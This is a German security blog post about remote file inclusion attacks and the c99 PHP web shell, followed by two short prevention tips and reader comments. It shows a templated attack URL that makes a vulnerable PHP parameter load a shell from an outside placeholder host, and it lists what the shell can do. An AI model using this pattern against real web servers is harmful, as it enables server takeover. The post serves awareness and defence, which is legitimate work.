BotNetzProvider.de Ein Security Blog über Honig-Töpfe (honeypots) , Bots und Bitcoin

Webserver Hacken – Remote File Inclusion (c99 php shell): 1 Star2 Stars3 Stars4 Stars5 Stars
3,00 von 5 Punkten, basierend auf 5 abgegebenen Stimmen.
Loading...

Webserver Hacken – Remote File Inclusion (c99 php shell)

Remote File Inclusion - c99 php shell

Ich denke mal nicht das ich noch groß über das Thema sprechen muss, was genau eine Remote File Inclusion ist.
Für alle die sich damit noch nicht auskennen sollten Wikipedia.de hat einen kurzen Artikel darüber HIER

Daher will ich mich heute mit der wohl am bekanntesten "PHP SHELL" (c99) beschäftigen.
Es ist natürlich verständlich, dass ich den Quellcode der c99 PHP Shell ein wenig bearbeiten musste, damit man diese
nicht sofort benutzen kann.

Zunächst einmal ist zu sagen, diese Shell muss nicht unbedingt auf dem eigenen Webserver liegen um genutzt zu werden.
Es reicht wenn diese auf einem anderen Webserver in reiner Textform abgelegt ist.

Ein klassisches Angriffsmuster sieht wie folgt aus:

http://der.zu.hackende.server.de/ungeschütze.variable.php?variable=http://pfad.zur.phpShell.de/c99

Wenn dieser Angriff erfolgreich war, wird folgendes Angezeigt: (Beispiel)

Mit dieser nun integrierten Shell, kann man nun den gesamten Webserver steuern.

Folgendes ist mit diesem Tool möglich:

  • FTP-Upload
  • Brute Force Attacken
  • Upload Files
  • SQL
  • Webserver Informationen anzeigen

Wie kann ich dem ganzen vorbeugen:

1. Halten Sie Ihren Server und die Software (Joomla,etc) immer auf dem aktuellsten Stand.
2. Überprüfen Sie öfters die Webserver Logdateien auf ungewöhnliche Einträge.

Kommentare (5) Trackbacks (0)
  1. danke für die Info. Ich werde wohl die php shell löschen müssen.

  2. eines der effektivsten tools um einen server oder ne website down zu hauen

  3. hab grad ne Email von meinem Hoster bekommen, dass bei mir auf der Joomla-Seite so eine PHP SHell Datei gefunden und gelöscht wurde. Wie ist diese bei mir denn drauf gekommen?

  4. Es kann sein, dass der Angreifer über einen RFI (remote file inclusion) auf deine Joomla-Präsenz gekommen ist. Gerne kannst du dich auch an ITS-Netzwerk.com wenden, wir können dir bei der Forensic helfen.


Leave a comment

Noch keine Trackbacks.

/* google like button API */